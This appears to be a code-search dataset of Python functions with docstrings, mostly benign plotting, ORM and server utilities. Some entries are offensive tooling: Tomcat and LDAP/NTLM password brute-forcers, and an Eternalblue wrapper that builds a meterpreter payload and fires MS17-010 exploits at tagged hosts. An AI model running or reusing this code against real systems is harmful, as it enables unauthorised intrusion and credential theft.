_id stringlengths 2 7 | title stringlengths 1 88 | partition stringclasses 3
values | text stringlengths 75 19.8k | language stringclasses 1
value | meta_information dict |
|---|---|---|---|---|---|
q264800 | IndexedRedisDelete.deleteMultipleByPks | validation | def deleteMultipleByPks(self, pks):
'''
deleteMultipleByPks - Delete multiple objects given their primary keys
@param pks - List of primary keys
@return - Number of objects deleted
'''
if type(pks) == set:
pks = list(pks)
if len(pks) == 1:
return self.deleteByPk(pks[0])
objs = self.mdl.objects.getMultipleOnlyIndexedFields(pks)
return self.deleteMultiple(objs) | python | {
"resource": ""
} |
q264801 | string | validation | def string(html, start_on=None, ignore=(), use_short=True, **queries):
'''Returns a blox template from an html string'''
if use_short:
html = grow_short(html)
return _to_template(fromstring(html), start_on=start_on,
ignore=ignore, **queries) | python | {
"resource": ""
} |
q264802 | file | validation | def file(file_object, start_on=None, ignore=(), use_short=True, **queries):
'''Returns a blox template from a file stream object'''
return string(file_object.read(), start_on=start_on, ignore=ignore, use_short=use_short, **queries) | python | {
"resource": ""
} |
q264803 | filename | validation | def filename(file_name, start_on=None, ignore=(), use_short=True, **queries):
'''Returns a blox template from a valid file path'''
with open(file_name) as template_file:
return file(template_file, start_on=start_on, ignore=ignore, use_short=use_short, **queries) | python | {
"resource": ""
} |
q264804 | keywords | validation | def keywords(func):
"""
Accumulate all dictionary and named arguments as
keyword argument dictionary. This is generally useful for
functions that try to automatically resolve inputs.
Examples:
>>> @keywords
>>> def test(*args, **kwargs):
>>> return kwargs
>>>
>>> print test({'one': 1}, two=2)
{'one': 1, 'two': 2}
"""
@wraps(func)
def decorator(*args, **kwargs):
idx = 0 if inspect.ismethod(func) else 1
if len(args) > idx:
if isinstance(args[idx], (dict, composite)):
for key in args[idx]:
kwargs[key] = args[idx][key]
args = args[:idx]
return func(*args, **kwargs)
return decorator | python | {
"resource": ""
} |
q264805 | IRCompressedField.getCompressMod | validation | def getCompressMod(self):
'''
getCompressMod - Return the module used for compression on this field
@return <module> - The module for compression
'''
if self.compressMode == COMPRESS_MODE_ZLIB:
return zlib
if self.compressMode == COMPRESS_MODE_BZ2:
return bz2
if self.compressMode == COMPRESS_MODE_LZMA:
# Since lzma is not provided by python core in python2, search out some common alternatives.
# Throw exception if we can find no lzma implementation.
global _lzmaMod
if _lzmaMod is not None:
return _lzmaMod
try:
import lzma
_lzmaMod = lzma
return _lzmaMod
except:
# Python2 does not provide "lzma" module, search for common alternatives
try:
from backports import lzma
_lzmaMod = lzma
return _lzmaMod
except:
pass
try:
import lzmaffi as lzma
_lzmaMod = lzma
return _lzmaMod
except:
pass
raise ImportError("Requested compress mode is lzma and could not find a module providing lzma support. Tried: 'lzma', 'backports.lzma', 'lzmaffi' and none of these were available. Please install one of these, or to use an unlisted implementation, set IndexedRedis.fields.compressed._lzmaMod to the module (must implement standard python compression interface)") | python | {
"resource": ""
} |
q264806 | IRUnicodeField.toBytes | validation | def toBytes(self, value):
'''
toBytes - Convert a value to bytes using the encoding specified on this field
@param value <str> - The field to convert to bytes
@return <bytes> - The object encoded using the codec specified on this field.
NOTE: This method may go away.
'''
if type(value) == bytes:
return value
return value.encode(self.getEncoding()) | python | {
"resource": ""
} |
q264807 | keep_kwargs_partial | validation | def keep_kwargs_partial(func, *args, **keywords):
"""Like functools.partial but instead of using the new kwargs, keeps the old ones."""
def newfunc(*fargs, **fkeywords):
newkeywords = fkeywords.copy()
newkeywords.update(keywords)
return func(*(args + fargs), **newkeywords)
newfunc.func = func
newfunc.args = args
newfunc.keywords = keywords
return newfunc | python | {
"resource": ""
} |
q264808 | remote_jupyter_proxy_url | validation | def remote_jupyter_proxy_url(port):
"""
Callable to configure Bokeh's show method when a proxy must be
configured.
If port is None we're asking about the URL
for the origin header.
"""
base_url = os.environ['EXTERNAL_URL']
host = urllib.parse.urlparse(base_url).netloc
# If port is None we're asking for the URL origin
# so return the public hostname.
if port is None:
return host
service_url_path = os.environ['JUPYTERHUB_SERVICE_PREFIX']
proxy_url_path = 'proxy/%d' % port
user_url = urllib.parse.urljoin(base_url, service_url_path)
full_url = urllib.parse.urljoin(user_url, proxy_url_path)
return full_url | python | {
"resource": ""
} |
q264809 | setup_notebook | validation | def setup_notebook(debug=False):
"""Called at the start of notebook execution to setup the environment.
This will configure bokeh, and setup the logging library to be
reasonable."""
output_notebook(INLINE, hide_banner=True)
if debug:
_setup_logging(logging.DEBUG)
logging.debug('Running notebook in debug mode.')
else:
_setup_logging(logging.WARNING)
# If JUPYTERHUB_SERVICE_PREFIX environment variable isn't set,
# this means that you're running JupyterHub not with Hub in k8s,
# and not using run_local.sh (which sets it to empty).
if 'JUPYTERHUB_SERVICE_PREFIX' not in os.environ:
global jupyter_proxy_url
jupyter_proxy_url = 'localhost:8888'
logging.info('Setting jupyter proxy to local mode.') | python | {
"resource": ""
} |
q264810 | overview | validation | def overview():
"""
Creates a overview of the hosts per range.
"""
range_search = RangeSearch()
ranges = range_search.get_ranges()
if ranges:
formatted_ranges = []
tags_lookup = {}
for r in ranges:
formatted_ranges.append({'mask': r.range})
tags_lookup[r.range] = r.tags
search = Host.search()
search = search.filter('term', status='up')
search.aggs.bucket('hosts', 'ip_range', field='address', ranges=formatted_ranges)
response = search.execute()
print_line("{0:<18} {1:<6} {2}".format("Range", "Count", "Tags"))
print_line("-" * 60)
for entry in response.aggregations.hosts.buckets:
print_line("{0:<18} {1:<6} {2}".format(entry.key, entry.doc_count, tags_lookup[entry.key]))
else:
print_error("No ranges defined.") | python | {
"resource": ""
} |
q264811 | create_hierarchy | validation | def create_hierarchy(hierarchy, level):
"""Create an OrderedDict
:param hierarchy: a dictionary
:param level: single key
:return: deeper dictionary
"""
if level not in hierarchy:
hierarchy[level] = OrderedDict()
return hierarchy[level] | python | {
"resource": ""
} |
q264812 | line_chunker | validation | def line_chunker(text, getreffs, lines=30):
""" Groups line reference together
:param text: Text object
:type text: MyCapytains.resources.text.api
:param getreffs: Callback function to retrieve text
:type getreffs: function(level)
:param lines: Number of lines to use by group
:type lines: int
:return: List of grouped urn references with their human readable version
:rtype: [(str, str)]
"""
level = len(text.citation)
source_reffs = [reff.split(":")[-1] for reff in getreffs(level=level)]
reffs = []
i = 0
while i + lines - 1 < len(source_reffs):
reffs.append(tuple([source_reffs[i]+"-"+source_reffs[i+lines-1], source_reffs[i]]))
i += lines
if i < len(source_reffs):
reffs.append(tuple([source_reffs[i]+"-"+source_reffs[len(source_reffs)-1], source_reffs[i]]))
return reffs | python | {
"resource": ""
} |
q264813 | level_chunker | validation | def level_chunker(text, getreffs, level=1):
""" Chunk a text at the passage level
:param text: Text object
:type text: MyCapytains.resources.text.api
:param getreffs: Callback function to retrieve text
:type getreffs: function(level)
:return: List of urn references with their human readable version
:rtype: [(str, str)]
"""
references = getreffs(level=level)
return [(ref.split(":")[-1], ref.split(":")[-1]) for ref in references] | python | {
"resource": ""
} |
q264814 | table | validation | def table(cluster):
"""
Create a numpy.ndarray with all observed fields and
computed teff and luminosity values.
"""
teffs = teff(cluster)
lums = luminosity(cluster)
arr = cluster.to_array()
i = 0
for row in arr:
row['lum'][0] = np.array([lums[i]], dtype='f')
row['temp'][0] = np.array([teffs[i]], dtype='f')
i += 1
arr = round_arr_teff_luminosity(arr)
return arr | python | {
"resource": ""
} |
q264815 | round_arr_teff_luminosity | validation | def round_arr_teff_luminosity(arr):
"""
Return the numpy array with rounded teff and luminosity columns.
"""
arr['temp'] = np.around(arr['temp'], -1)
arr['lum'] = np.around(arr['lum'], 3)
return arr | python | {
"resource": ""
} |
q264816 | main | validation | def main():
"""
Checks the arguments to brutefore and spawns greenlets to perform the bruteforcing.
"""
services = ServiceSearch()
argparse = services.argparser
argparse.add_argument('-f', '--file', type=str, help="File")
arguments = argparse.parse_args()
if not arguments.file:
print_error("Please provide a file with credentials seperated by ':'")
sys.exit()
services = services.get_services(search=["Tomcat"], up=True, tags=['!tomcat_brute'])
credentials = []
with open(arguments.file, 'r') as f:
credentials = f.readlines()
for service in services:
print_notification("Checking ip:{} port {}".format(service.address, service.port))
url = 'http://{}:{}/manager/html'
gevent.spawn(brutefore_passwords, service.address, url.format(service.address, service.port), credentials, service)
service.add_tag('tomcat_brute')
service.update(tags=service.tags)
gevent.wait()
# TODO fix stats
Logger().log("tomcat_brute", "Performed tomcat bruteforce scan", {'scanned_services': len(services)}) | python | {
"resource": ""
} |
q264817 | skyimage_figure | validation | def skyimage_figure(cluster):
"""
Given a cluster create a Bokeh plot figure using the
cluster's image.
"""
pf_image = figure(x_range=(0, 1), y_range=(0, 1),
title='Image of {0}'.format(cluster.name))
pf_image.image_url(url=[cluster.image_path],
x=0, y=0, w=1, h=1, anchor='bottom_left')
pf_image.toolbar_location = None
pf_image.axis.visible = False
return pf_image | python | {
"resource": ""
} |
q264818 | round_teff_luminosity | validation | def round_teff_luminosity(cluster):
"""
Returns rounded teff and luminosity lists.
"""
temps = [round(t, -1) for t in teff(cluster)]
lums = [round(l, 3) for l in luminosity(cluster)]
return temps, lums | python | {
"resource": ""
} |
q264819 | hr_diagram_figure | validation | def hr_diagram_figure(cluster):
"""
Given a cluster create a Bokeh plot figure creating an
H-R diagram.
"""
temps, lums = round_teff_luminosity(cluster)
x, y = temps, lums
colors, color_mapper = hr_diagram_color_helper(temps)
x_range = [max(x) + max(x) * 0.05, min(x) - min(x) * 0.05]
source = ColumnDataSource(data=dict(x=x, y=y, color=colors))
pf = figure(y_axis_type='log', x_range=x_range, name='hr',
tools='box_select,lasso_select,reset,hover',
title='H-R Diagram for {0}'.format(cluster.name))
pf.select(BoxSelectTool).select_every_mousemove = False
pf.select(LassoSelectTool).select_every_mousemove = False
hover = pf.select(HoverTool)[0]
hover.tooltips = [("Temperature (Kelvin)", "@x{0}"),
("Luminosity (solar units)", "@y{0.00}")]
_diagram(source=source, plot_figure=pf, name='hr',
color={'field': 'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
return pf | python | {
"resource": ""
} |
q264820 | calculate_diagram_ranges | validation | def calculate_diagram_ranges(data):
"""
Given a numpy array calculate what the ranges of the H-R
diagram should be.
"""
data = round_arr_teff_luminosity(data)
temps = data['temp']
x_range = [1.05 * np.amax(temps), .95 * np.amin(temps)]
lums = data['lum']
y_range = [.50 * np.amin(lums), 2 * np.amax(lums)]
return (x_range, y_range) | python | {
"resource": ""
} |
q264821 | hr_diagram_from_data | validation | def hr_diagram_from_data(data, x_range, y_range):
"""
Given a numpy array create a Bokeh plot figure creating an
H-R diagram.
"""
_, color_mapper = hr_diagram_color_helper([])
data_dict = {
'x': list(data['temperature']),
'y': list(data['luminosity']),
'color': list(data['color'])
}
source = ColumnDataSource(data=data_dict)
pf = figure(y_axis_type='log', x_range=x_range, y_range=y_range)
_diagram(source=source, plot_figure=pf,
color={'field': 'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
show_with_bokeh_server(pf) | python | {
"resource": ""
} |
q264822 | SHRD._filter_cluster_data | validation | def _filter_cluster_data(self):
"""
Filter the cluster data catalog into the filtered_data
catalog, which is what is shown in the H-R diagram.
Filter on the values of the sliders, as well as the lasso
selection in the skyviewer.
"""
min_temp = self.temperature_range_slider.value[0]
max_temp = self.temperature_range_slider.value[1]
temp_mask = np.logical_and(
self.cluster.catalog['temperature'] >= min_temp,
self.cluster.catalog['temperature'] <= max_temp
)
min_lum = self.luminosity_range_slider.value[0]
max_lum = self.luminosity_range_slider.value[1]
lum_mask = np.logical_and(
self.cluster.catalog['luminosity'] >= min_lum,
self.cluster.catalog['luminosity'] <= max_lum
)
selected_mask = np.isin(self.cluster.catalog['id'], self.selection_ids)
filter_mask = temp_mask & lum_mask & selected_mask
self.filtered_data = self.cluster.catalog[filter_mask].data
self.source.data = {
'id': list(self.filtered_data['id']),
'temperature': list(self.filtered_data['temperature']),
'luminosity': list(self.filtered_data['luminosity']),
'color': list(self.filtered_data['color'])
}
logging.debug("Selected data is now: %s", self.filtered_data) | python | {
"resource": ""
} |
q264823 | modify_data | validation | def modify_data(data):
"""
Creates a tempfile and starts the given editor, returns the data afterwards.
"""
with tempfile.NamedTemporaryFile('w') as f:
for entry in data:
f.write(json.dumps(entry.to_dict(
include_meta=True),
default=datetime_handler))
f.write('\n')
f.flush()
print_success("Starting editor")
subprocess.call(['nano', '-', f.name])
with open(f.name, 'r') as f:
return f.readlines() | python | {
"resource": ""
} |
q264824 | modify_input | validation | def modify_input():
"""
This functions gives the user a way to change the data that is given as input.
"""
doc_mapper = DocMapper()
if doc_mapper.is_pipe:
objects = [obj for obj in doc_mapper.get_pipe()]
modified = modify_data(objects)
for line in modified:
obj = doc_mapper.line_to_object(line)
obj.save()
print_success("Object(s) successfully changed")
else:
print_error("Please use this tool with pipes") | python | {
"resource": ""
} |
q264825 | bruteforce | validation | def bruteforce(users, domain, password, host):
"""
Performs a bruteforce for the given users, password, domain on the given host.
"""
cs = CredentialSearch(use_pipe=False)
print_notification("Connecting to {}".format(host))
s = Server(host)
c = Connection(s)
for user in users:
if c.rebind(user="{}\\{}".format(domain, user.username), password=password, authentication=NTLM):
print_success('Success for: {}:{}'.format(user.username, password))
credential = cs.find_object(
user.username, password, domain=domain, host_ip=host)
if not credential:
credential = Credential(username=user.username, secret=password,
domain=domain, host_ip=host, type="plaintext", port=389)
credential.add_tag(tag)
credential.save()
# Add a tag to the user object, so we dont have to bruteforce it again.
user.add_tag(tag)
user.save()
else:
print_error("Fail for: {}:{}".format(user.username, password)) | python | {
"resource": ""
} |
q264826 | SharedPathMethods.utime | validation | def utime(self, *args, **kwargs):
""" Set the access and modified times of the file specified by path. """
os.utime(self.extended_path, *args, **kwargs) | python | {
"resource": ""
} |
q264827 | WindowsPath2._from_parts | validation | def _from_parts(cls, args, init=True):
"""
Strip \\?\ prefix in init phase
"""
if args:
args = list(args)
if isinstance(args[0], WindowsPath2):
args[0] = args[0].path
elif args[0].startswith("\\\\?\\"):
args[0] = args[0][4:]
args = tuple(args)
return super(WindowsPath2, cls)._from_parts(args, init) | python | {
"resource": ""
} |
q264828 | WindowsPath2.path | validation | def path(self):
"""
Return the path always without the \\?\ prefix.
"""
path = super(WindowsPath2, self).path
if path.startswith("\\\\?\\"):
return path[4:]
return path | python | {
"resource": ""
} |
q264829 | format | validation | def format():
"""
Formats the output of another tool in the given way.
Has default styles for ranges, hosts and services.
"""
argparser = argparse.ArgumentParser(description='Formats a json object in a certain way. Use with pipes.')
argparser.add_argument('format', metavar='format', help='How to format the json for example "{address}:{port}".', nargs='?')
arguments = argparser.parse_args()
service_style = "{address:15} {port:7} {protocol:5} {service:15} {state:10} {banner} {tags}"
host_style = "{address:15} {tags}"
ranges_style = "{range:18} {tags}"
users_style = "{username}"
if arguments.format:
format_input(arguments.format)
else:
doc_mapper = DocMapper()
if doc_mapper.is_pipe:
for obj in doc_mapper.get_pipe():
style = ''
if isinstance(obj, Range):
style = ranges_style
elif isinstance(obj, Host):
style = host_style
elif isinstance(obj, Service):
style = service_style
elif isinstance(obj, User):
style = users_style
print_line(fmt.format(style, **obj.to_dict(include_meta=True)))
else:
print_error("Please use this script with pipes") | python | {
"resource": ""
} |
q264830 | print_line | validation | def print_line(text):
"""
Print the given line to stdout
"""
try:
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
except ValueError:
pass
try:
sys.stdout.write(text)
if not text.endswith('\n'):
sys.stdout.write('\n')
sys.stdout.flush()
except IOError:
sys.exit(0) | python | {
"resource": ""
} |
q264831 | get_own_ip | validation | def get_own_ip():
"""
Gets the IP from the inet interfaces.
"""
own_ip = None
interfaces = psutil.net_if_addrs()
for _, details in interfaces.items():
for detail in details:
if detail.family == socket.AF_INET:
ip_address = ipaddress.ip_address(detail.address)
if not (ip_address.is_link_local or ip_address.is_loopback):
own_ip = str(ip_address)
break
return own_ip | python | {
"resource": ""
} |
q264832 | pprint | validation | def pprint(arr, columns=('temperature', 'luminosity'),
names=('Temperature (Kelvin)', 'Luminosity (solar units)'),
max_rows=32, precision=2):
"""
Create a pandas DataFrame from a numpy ndarray.
By default use temp and lum with max rows of 32 and precision of 2.
arr - An numpy.ndarray.
columns - The columns to include in the pandas DataFrame. Defaults to
temperature and luminosity.
names - The column names for the pandas DataFrame. Defaults to
Temperature and Luminosity.
max_rows - If max_rows is an integer then set the pandas
display.max_rows option to that value. If max_rows
is True then set display.max_rows option to 1000.
precision - An integer to set the pandas precision option.
"""
if max_rows is True:
pd.set_option('display.max_rows', 1000)
elif type(max_rows) is int:
pd.set_option('display.max_rows', max_rows)
pd.set_option('precision', precision)
df = pd.DataFrame(arr.flatten(), index=arr['id'].flatten(),
columns=columns)
df.columns = names
return df.style.format({names[0]: '{:.0f}',
names[1]: '{:.2f}'}) | python | {
"resource": ""
} |
q264833 | strip_labels | validation | def strip_labels(filename):
"""Strips labels."""
labels = []
with open(filename) as f, open('processed_labels.txt', 'w') as f1:
for l in f:
if l.startswith('#'):
next
l = l.replace(" .", '')
l = l.replace(">\tskos:prefLabel\t", ' ')
l = l.replace("<", '')
l = l.replace(">\trdfs:label\t", ' ')
f1.write(l) | python | {
"resource": ""
} |
q264834 | remove_namespace | validation | def remove_namespace(doc, namespace):
'''Remove namespace in the passed document in place.'''
ns = u'{%s}' % namespace
nsl = len(ns)
for elem in doc.getiterator():
if elem.tag.startswith(ns):
elem.tag = elem.tag[nsl:]
elem.attrib['oxmlns'] = namespace | python | {
"resource": ""
} |
q264835 | LocalRetriever.match | validation | def match(self, uri):
""" Check to see if this URI is retrievable by this Retriever implementation
:param uri: the URI of the resource to be retrieved
:type uri: str
:return: True if it can be, False if not
:rtype: bool
"""
absolute_uri = self.__absolute__(uri)
return absolute_uri.startswith(self.__path__) and op.exists(absolute_uri) | python | {
"resource": ""
} |
q264836 | hook | validation | def hook(name):
'''
Decorator used to tag a method that should be used as a hook for the
specified `name` hook type.
'''
def hookTarget(wrapped):
if not hasattr(wrapped, '__hook__'):
wrapped.__hook__ = [name]
else:
wrapped.__hook__.append(name)
return wrapped
return hookTarget | python | {
"resource": ""
} |
q264837 | CommandLineSyncEngine.addHook | validation | def addHook(self, name, callable):
'''
Subscribes `callable` to listen to events of `name` type. The
parameters passed to `callable` are dependent on the specific
event being triggered.
'''
if name not in self._hooks:
self._hooks[name] = []
self._hooks[name].append(callable) | python | {
"resource": ""
} |
q264838 | CommandLineSyncEngine.configure | validation | def configure(self, argv=None):
'''
Configures this engine based on the options array passed into
`argv`. If `argv` is ``None``, then ``sys.argv`` is used instead.
During configuration, the command line options are merged with
previously stored values. Then the logging subsystem and the
database model are initialized, and all storable settings are
serialized to configurations files.
'''
self._setupOptions()
self._parseOptions(argv)
self._setupLogging()
self._setupModel()
self.dbsession.commit()
return self | python | {
"resource": ""
} |
q264839 | RawlBase._assemble_select | validation | def _assemble_select(self, sql_str, columns, *args, **kwargs):
""" Alias for _assemble_with_columns
"""
warnings.warn("_assemble_select has been depreciated for _assemble_with_columns. It will be removed in a future version.", DeprecationWarning)
return self._assemble_with_columns(sql_str, columns, *args, **kwargs) | python | {
"resource": ""
} |
q264840 | RawlBase._execute | validation | def _execute(self, query, commit=False, working_columns=None):
"""
Execute a query with provided parameters
Parameters
:query: SQL string with parameter placeholders
:commit: If True, the query will commit
:returns: List of rows
"""
log.debug("RawlBase._execute()")
result = []
if working_columns is None:
working_columns = self.columns
with RawlConnection(self.dsn) as conn:
query_id = random.randrange(9999)
curs = conn.cursor()
try:
log.debug("Executing(%s): %s" % (query_id, query.as_string(curs)))
except:
log.exception("LOGGING EXCEPTION LOL")
curs.execute(query)
log.debug("Executed")
if commit == True:
log.debug("COMMIT(%s)" % query_id)
conn.commit()
log.debug("curs.rowcount: %s" % curs.rowcount)
if curs.rowcount > 0:
#result = curs.fetchall()
# Process the results into a dict and stuff it in a RawlResult
# object. Then append that object to result
result_rows = curs.fetchall()
for row in result_rows:
i = 0
row_dict = {}
for col in working_columns:
try:
#log.debug("row_dict[%s] = row[%s] which is %s" % (col, i, row[i]))
# For aliased columns, we need to get rid of the dot
col = col.replace('.', '_')
row_dict[col] = row[i]
except IndexError: pass
i += 1
log.debug("Appending dict to result: %s" % row_dict)
rr = RawlResult(working_columns, row_dict)
result.append(rr)
curs.close()
return result | python | {
"resource": ""
} |
q264841 | RawlBase.process_columns | validation | def process_columns(self, columns):
"""
Handle provided columns and if necessary, convert columns to a list for
internal strage.
:columns: A sequence of columns for the table. Can be list, comma
-delimited string, or IntEnum.
"""
if type(columns) == list:
self.columns = columns
elif type(columns) == str:
self.columns = [c.strip() for c in columns.split()]
elif type(columns) == IntEnum:
self.columns = [str(c) for c in columns]
else:
raise RawlException("Unknown format for columns") | python | {
"resource": ""
} |
q264842 | RawlBase.query | validation | def query(self, sql_string, *args, **kwargs):
"""
Execute a DML query
:sql_string: An SQL string template
:*args: Arguments to be passed for query parameters.
:commit: Whether or not to commit the transaction after the query
:returns: Psycopg2 result
"""
commit = None
columns = None
if kwargs.get('commit') is not None:
commit = kwargs.pop('commit')
if kwargs.get('columns') is not None:
columns = kwargs.pop('columns')
query = self._assemble_simple(sql_string, *args, **kwargs)
return self._execute(query, commit=commit, working_columns=columns) | python | {
"resource": ""
} |
q264843 | RawlBase.select | validation | def select(self, sql_string, cols, *args, **kwargs):
"""
Execute a SELECT statement
:sql_string: An SQL string template
:columns: A list of columns to be returned by the query
:*args: Arguments to be passed for query parameters.
:returns: Psycopg2 result
"""
working_columns = None
if kwargs.get('columns') is not None:
working_columns = kwargs.pop('columns')
query = self._assemble_select(sql_string, cols, *args, *kwargs)
return self._execute(query, working_columns=working_columns) | python | {
"resource": ""
} |
q264844 | RawlBase.get | validation | def get(self, pk):
"""
Retreive a single record from the table. Lots of reasons this might be
best implemented in the model
:pk: The primary key ID for the record
:returns: List of single result
"""
if type(pk) == str:
# Probably an int, give it a shot
try:
pk = int(pk)
except ValueError: pass
return self.select(
"SELECT {0} FROM " + self.table + " WHERE " + self.pk + " = {1};",
self.columns, pk) | python | {
"resource": ""
} |
q264845 | Eternalblue.create_payload | validation | def create_payload(self, x86_file, x64_file, payload_file):
"""
Creates the final payload based on the x86 and x64 meterpreters.
"""
sc_x86 = open(os.path.join(self.datadir, x86_file), 'rb').read()
sc_x64 = open(os.path.join(self.datadir, x64_file), 'rb').read()
fp = open(os.path.join(self.datadir, payload_file), 'wb')
fp.write(b'\x31\xc0\x40\x0f\x84' + pack('<I', len(sc_x86)))
fp.write(sc_x86)
fp.write(sc_x64)
fp.close() | python | {
"resource": ""
} |
q264846 | Eternalblue.combine_files | validation | def combine_files(self, f1, f2, f3):
"""
Combines the files 1 and 2 into 3.
"""
with open(os.path.join(self.datadir, f3), 'wb') as new_file:
with open(os.path.join(self.datadir, f1), 'rb') as file_1:
new_file.write(file_1.read())
with open(os.path.join(self.datadir, f2), 'rb') as file_2:
new_file.write(file_2.read()) | python | {
"resource": ""
} |
q264847 | Eternalblue.detect_os | validation | def detect_os(self, ip):
"""
Runs the checker.py scripts to detect the os.
"""
process = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'checker.py'), str(ip)], stdout=subprocess.PIPE)
out = process.stdout.decode('utf-8').split('\n')
system_os = ''
for line in out:
if line.startswith('Target OS:'):
system_os = line.replace('Target OS: ', '')
break
return system_os | python | {
"resource": ""
} |
q264848 | Eternalblue.exploit | validation | def exploit(self):
"""
Starts the exploiting phase, you should run setup before running this function.
if auto is set, this function will fire the exploit to all systems. Otherwise a curses interface is shown.
"""
search = ServiceSearch()
host_search = HostSearch()
services = search.get_services(tags=['MS17-010'])
services = [service for service in services]
if len(services) == 0:
print_error("No services found that are vulnerable for MS17-010")
return
if self.auto:
print_success("Found {} services vulnerable for MS17-010".format(len(services)))
for service in services:
print_success("Exploiting " + str(service.address))
host = host_search.id_to_object(str(service.address))
system_os = ''
if host.os:
system_os = host.os
else:
system_os = self.detect_os(str(service.address))
host.os = system_os
host.save()
text = self.exploit_single(str(service.address), system_os)
print_notification(text)
else:
service_list = []
for service in services:
host = host_search.id_to_object(str(service.address))
system_os = ''
if host.os:
system_os = host.os
else:
system_os = self.detect_os(str(service.address))
host.os = system_os
host.save()
service_list.append({'ip': service.address, 'os': system_os, 'string': "{ip} ({os}) {hostname}".format(ip=service.address, os=system_os, hostname=host.hostname)})
draw_interface(service_list, self.callback, "Exploiting {ip} with OS: {os}") | python | {
"resource": ""
} |
q264849 | Eternalblue.exploit_single | validation | def exploit_single(self, ip, operating_system):
"""
Exploits a single ip, exploit is based on the given operating system.
"""
result = None
if "Windows Server 2008" in operating_system or "Windows 7" in operating_system:
result = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'eternalblue_exploit7.py'), str(ip), os.path.join(self.datadir, 'final_combined.bin'), "12"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
elif "Windows Server 2012" in operating_system or "Windows 10" in operating_system or "Windows 8.1" in operating_system:
result = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'eternalblue_exploit8.py'), str(ip), os.path.join(self.datadir, 'final_combined.bin'), "12"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
return ["System target could not be automatically identified"]
return result.stdout.decode('utf-8').split('\n') | python | {
"resource": ""
} |
q264850 | make_server | validation | def make_server(host, port, app=None,
server_class=AsyncWsgiServer,
handler_class=AsyncWsgiHandler,
ws_handler_class=None,
ws_path='/ws'):
"""Create server instance with an optional WebSocket handler
For pure WebSocket server ``app`` may be ``None`` but an attempt to access
any path other than ``ws_path`` will cause server error.
:param host: hostname or IP
:type host: str
:param port: server port
:type port: int
:param app: WSGI application
:param server_class: WSGI server class, defaults to AsyncWsgiServer
:param handler_class: WSGI handler class, defaults to AsyncWsgiHandler
:param ws_handler_class: WebSocket hanlder class, defaults to ``None``
:param ws_path: WebSocket path on the server, defaults to '/ws'
:type ws_path: str, optional
:return: initialized server instance
"""
handler_class.ws_handler_class = ws_handler_class
handler_class.ws_path = ws_path
httpd = server_class((host, port), RequestHandlerClass=handler_class)
httpd.set_app(app)
return httpd | python | {
"resource": ""
} |
q264851 | AsyncWsgiServer.poll_once | validation | def poll_once(self, timeout=0.0):
"""
Poll active sockets once
This method can be used to allow aborting server polling loop
on some condition.
:param timeout: polling timeout
"""
if self._map:
self._poll_func(timeout, self._map) | python | {
"resource": ""
} |
q264852 | AsyncWsgiServer.serve_forever | validation | def serve_forever(self, poll_interval=0.5):
"""
Start serving HTTP requests
This method blocks the current thread.
:param poll_interval: polling timeout
:return:
"""
logger.info('Starting server on {}:{}...'.format(
self.server_name, self.server_port)
)
while True:
try:
self.poll_once(poll_interval)
except (KeyboardInterrupt, SystemExit):
break
self.handle_close()
logger.info('Server stopped.') | python | {
"resource": ""
} |
q264853 | write_index_translation | validation | def write_index_translation(translation_filename, entity_ids, relation_ids):
"""write triples into a translation file."""
translation = triple_pb.Translation()
entities = []
for name, index in entity_ids.items():
translation.entities.add(element=name, index=index)
relations = []
for name, index in relation_ids.items():
translation.relations.add(element=name, index=index)
with open(translation_filename, "wb") as f:
f.write(translation.SerializeToString()) | python | {
"resource": ""
} |
q264854 | write_triples | validation | def write_triples(filename, triples, delimiter=DEFAULT_DELIMITER, triple_order="hrt"):
"""write triples to file."""
with open(filename, 'w') as f:
for t in triples:
line = t.serialize(delimiter, triple_order)
f.write(line + "\n") | python | {
"resource": ""
} |
q264855 | read_translation | validation | def read_translation(filename):
"""Returns protobuf mapcontainer. Read from translation file."""
translation = triple_pb.Translation()
with open(filename, "rb") as f:
translation.ParseFromString(f.read())
def unwrap_translation_units(units):
for u in units: yield u.element, u.index
return (list(unwrap_translation_units(translation.entities)),
list(unwrap_translation_units(translation.relations))) | python | {
"resource": ""
} |
q264856 | read_openke_translation | validation | def read_openke_translation(filename, delimiter='\t', entity_first=True):
"""Returns map with entity or relations from plain text."""
result = {}
with open(filename, "r") as f:
_ = next(f) # pass the total entry number
for line in f:
line_slice = line.rstrip().split(delimiter)
if not entity_first:
line_slice = list(reversed(line_slice))
result[line_slice[0]] = line_slice[1]
return result | python | {
"resource": ""
} |
q264857 | overview | validation | def overview():
"""
Prints an overview of the tags of the hosts.
"""
doc = Host()
search = doc.search()
search.aggs.bucket('tag_count', 'terms', field='tags', order={'_count': 'desc'}, size=100)
response = search.execute()
print_line("{0:<25} {1}".format('Tag', 'Count'))
print_line("-" * 30)
for entry in response.aggregations.tag_count.buckets:
print_line("{0:<25} {1}".format(entry.key, entry.doc_count)) | python | {
"resource": ""
} |
q264858 | main | validation | def main():
"""
Main credentials tool
"""
cred_search = CredentialSearch()
arg = argparse.ArgumentParser(parents=[cred_search.argparser], conflict_handler='resolve')
arg.add_argument('-c', '--count', help="Only show the number of results", action="store_true")
arguments = arg.parse_args()
if arguments.count:
print_line("Number of credentials: {}".format(cred_search.argument_count()))
else:
response = cred_search.get_credentials()
for hit in response:
print_json(hit.to_dict(include_meta=True)) | python | {
"resource": ""
} |
q264859 | overview | validation | def overview():
"""
Provides an overview of the duplicate credentials.
"""
search = Credential.search()
search.aggs.bucket('password_count', 'terms', field='secret', order={'_count': 'desc'}, size=20)\
.metric('username_count', 'cardinality', field='username') \
.metric('host_count', 'cardinality', field='host_ip') \
.metric('top_hits', 'top_hits', docvalue_fields=['username'], size=100)
response = search.execute()
print_line("{0:65} {1:5} {2:5} {3:5} {4}".format("Secret", "Count", "Hosts", "Users", "Usernames"))
print_line("-"*100)
for entry in response.aggregations.password_count.buckets:
usernames = []
for creds in entry.top_hits:
usernames.append(creds.username[0])
usernames = list(set(usernames))
print_line("{0:65} {1:5} {2:5} {3:5} {4}".format(entry.key, entry.doc_count, entry.host_count.value, entry.username_count.value, usernames)) | python | {
"resource": ""
} |
